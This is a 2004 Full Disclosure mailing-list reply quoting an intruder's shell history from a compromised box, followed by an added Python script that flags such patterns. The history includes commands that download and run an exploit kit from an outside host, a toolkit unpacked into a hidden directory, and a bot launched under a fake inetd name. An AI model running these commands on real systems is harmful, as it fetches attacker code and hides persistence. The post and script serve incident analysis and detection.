Full Disclosure mailing list archives
Re: Re: Automated SSH login attempts?
From: andrewg () felinemenace org
Date: Fri, 30 Jul 2004 06:36:02 -0700
Greetings list,

Accidentally sent only to Stefan, so redoing it.

On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attempts, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I managed
> to get my hands on a machine that was originating such login attempts. I
> must admit I am far from being a linux security expert, but this is what
> I've found out up to now:

I got a similar experience from a game box I look after (void.labs.pulltheplug.com, but people may prefer http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @ irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH' inetd -e -o

It would appear that if they can't get a local root, they'll use the box for IRCing from.

Hopefully this helps someone. I haven't looked too much into this, if wanted I could grab the source ip addresses used for logging into guest, but that's probably not overly useful.

Thanks,
Andrew Griffiths

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
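Added example, not part of the original post: a small Python triage pass over a shell history that flags the patterns visible in the history quoted in the message above (download-unpack-run chains, archive fetches, hidden directory creation, "." placed first in PATH, binaries run from the current directory). The rule names and regexes are this example's own assumptions; the sample lines are a subset of the quoted history.

```python
import re

# Triage heuristics modelled on the quoted .bash_history. They produce leads
# for a human to review, not verdicts; names and patterns are assumptions.
RULES = [
    ("fetch-unpack-run",
     re.compile(r"\b(wget|lynx|ncftpget|curl)\b.*;.*\btar\b.*;.*\./\w+")),
    ("remote-archive-fetch",
     re.compile(r"\b(wget|lynx|ncftpget|curl)\b\s+\S+\.(tgz|tar\.gz|tar)\b")),
    ("hidden-dir-created",
     re.compile(r"\bmkdir\s+(-\S+\s+)*\.[^./\s]\S*")),
    ("dot-first-in-PATH",
     re.compile(r"\bPATH=['\"]?\.(:|['\"]|\s|$)")),
    ("run-from-cwd",
     re.compile(r"^\./\S+")),
]

def triage(history_text):
    """Return (line_number, rule_name, command) for each flagged history line."""
    hits = []
    for n, raw in enumerate(history_text.splitlines(), 1):
        cmd = raw.strip()
        if not cmd or cmd.startswith("#"):  # blank lines, HISTTIMEFORMAT stamps
            continue
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((n, name, cmd))
    return hits

# Sample input: lines copied from the history quoted in the message.
SAMPLE = """\
uname -a
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ls -alF
./prt
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
cd .drivers
PATH='.:$PATH' inetd -e -o
"""

if __name__ == "__main__":
    for n, rule, cmd in triage(SAMPLE):
        print(f"line {n:>2}  {rule:<22} {cmd}")
```

A flagged "dot-first-in-PATH" line followed by a system daemon name, as in the last sample line, is worth checking against the process list: the binary that ran came from the current directory, not from the system path.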